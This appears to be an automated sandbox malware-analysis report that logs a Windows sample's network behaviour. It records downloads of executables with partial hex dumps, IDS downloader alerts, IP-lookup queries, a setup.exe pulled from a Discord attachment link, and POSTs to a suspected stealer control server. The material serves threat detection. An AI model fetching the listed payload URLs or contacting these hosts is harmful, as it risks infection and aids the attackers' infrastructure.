Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: PXmC5_sqNQv8jWyecSd7ycvv.exe.3.dr
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.9:49750 -> 89.105.201.183:2023
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 22:53:22 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sat, 28 Sep 2024 17:54:38 GMTETag: "982000-62331aa50f9f7"Accept-Ranges: bytesContent-Length: 9969664Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 7e d8 f7 66 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 2b 00 00 1c 98 00 00 0c 00 00 a0 14 00 00 00 10 00 00 00 10 2c 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 98 00 00 04 00 00 1c a9 98 00 02 00 40 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 94 00 42 00 00 00 00 10 94 00 98 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 94 00 88 3b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 ad 93 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 12 94 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 fa 2b 00 00 10 00 00 00 fc 2b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 c4 0f 67 00 00 10 2c 00 00 10 67 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 54 9e 00 00 00 20 93 00 00 a0 00 00 00 10 93 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 65 68 5f 66 72 61 6d d8 21 00 00 00 c0 93 00 00 22 00 00 00 b0 93 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 74 0b 00 00 00 f0 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 65 64 61 74 61 00 00 42 00 00 00 00 00 94 00 00 02 00 00 00 d2 93 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 69 64 61 74 61 00 00 98 0a 00 00 00 10 94 00 00 0c 00 00 00 d4 93 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 30 00 00 00 00 20 94 00 00 02 00 00 00 e0 93 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 30 94 00 00 02 00 00 00 e2 93 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 88 3b 04 00 00 40 94 00 00 3c 04 00 00 e4 93 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 22:53:22 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="univ.exe";Content-Length: 331776Content-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 73 ac 3c b2 12 c2 6f b2 12 c2 6f b2 12 c2 6f dd 64 69 6f a6 12 c2 6f dd 64 5c 6f 92 12 c2 6f dd 64 68 6f ef 12 c2 6f bb 6a 51 6f b9 12 c2 6f b2 12 c3 6f 34 12 c2 6f dd 64 6d 6f b3 12 c2 6f dd 64 58 6f b3 12 c2 6f dd 64 5f 6f b3 12 c2 6f 52 69 63 68 b2 12 c2 6f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bb 8f 1d 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 ae 03 00 00 74 04 00 00 00 00 00 5d 16 03 00 00 10 00 00 00 c0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 08 00 00 04 00 00 cb be 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c b1 03 00 78 00 00 00 00 20 07 00 98 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 b1 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 02 00 18 00 00 00 b8 fe 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 ad 03 00 00 10 00 00 00 ae 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 28 5d 03 00 00 c0 03 00 00 5c 00 00 00 b2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 00 01 00 00 20 07 00 00 02 01 00 00 0e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 22:53:22 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sat, 28 Sep 2024 18:18:14 GMTETag: "5d8600-62331fec2a069"Accept-Ranges: bytesContent-Length: 6129152Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 9a 5c 00 00 00 00 00 e0 00 02 01 0b 01 03 00 00 8c 29 00 00 b4 04 00 00 00 00 00 a0 29 07 00 00 10 00 00 00 d0 56 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 60 00 00 04 00 00 9d 3b 5e 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 5d 00 4c 04 00 00 00 b0 5f 00 f4 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 5d 00 10 17 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 d8 56 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 8a 29 00 00 10 00 00 00 8c 29 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d8 20 2d 00 00 a0 29 00 00 22 2d 00 00 90 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e0 91 06 00 00 d0 56 00 00 ca 03 00 00 b2 56 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 4c 04 00 00 00 70 5d 00 00 06 00 00 00 7c 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 10 17 02 00 00 80 5d 00 00 18 02 00 00 82 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 a0 5f 00 00 02 00 00 00 9a 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 f4 e8 00 00 00 b0 5f 00 00 ea 00 00 00 9c 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.1Date: Sat, 28 Sep 2024 22:53:22 GMTContent-Type: application/octet-streamContent-Length: 3128802Connection: keep-aliveX-Powered-By: PHP/7.4.33Content-Description: File TransferContent-Disposition: attachment; filename=stories.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 00 94 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 4c 02 00 00 00 b0 00 00 00 04 00 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 88 0e 00 00 00 c0 00 00 00 00 00 00 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 b4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 22:54:17 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Sep 2024 22:54:18 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 194.58.114.223 194.58.114.223
Source: Joe Sandbox View IP Address: 80.66.75.114 80.66.75.114
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: api64.ipify.org
Source: unknown DNS query: name: ipinfo.io
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49708 -> 103.130.147.211:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49709 -> 80.66.75.114:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49713 -> 147.45.60.44:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49711 -> 194.58.114.223:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.9:49710 -> 103.130.147.211:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49712 -> 176.113.115.95:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49710 -> 103.130.147.211:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: HEAD /attachments/1274634716451967060/1289665540448583732/setup.exe?ex=66f9a621&is=66f854a1&hm=fc4266f43c6f8dfc860fb6b6d8abbcf74b2c0c3aad95f3315ea5328c3afac3cf& HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/1274634716451967060/1289665540448583732/setup.exe?ex=66f9a621&is=66f854a1&hm=fc4266f43c6f8dfc860fb6b6d8abbcf74b2c0c3aad95f3315ea5328c3afac3cf& HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-AliveCookie: __cf_bm=wpi6oPUcntYrXWT3PYGwGgDWKmpGfD4ZkuNO6kBvh64-1727564002-1.0.1.1-MrMb8JOnPSN8tnxNgmDckRkxoeMJPdy.Zdp6geseOA1kyYiRgyy32DpdsDfaphc.ai880_T0oqzy1Ij9IOvFEQ; _cfuvid=Fux3.V5pZy3_FTP4N1VuUhIkq8HQnc5B3SRi7LPp5jE-1727564002783-0.0.1.1-604800000
Source: global traffic HTTP traffic detected: GET /1S3fd7 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplog.co
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=zPvL5qHLNFjzjGH64_q7uWh7bq6YbdsIYhoNDxlcPc8-1727564030-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: ghostreedmnu.shop
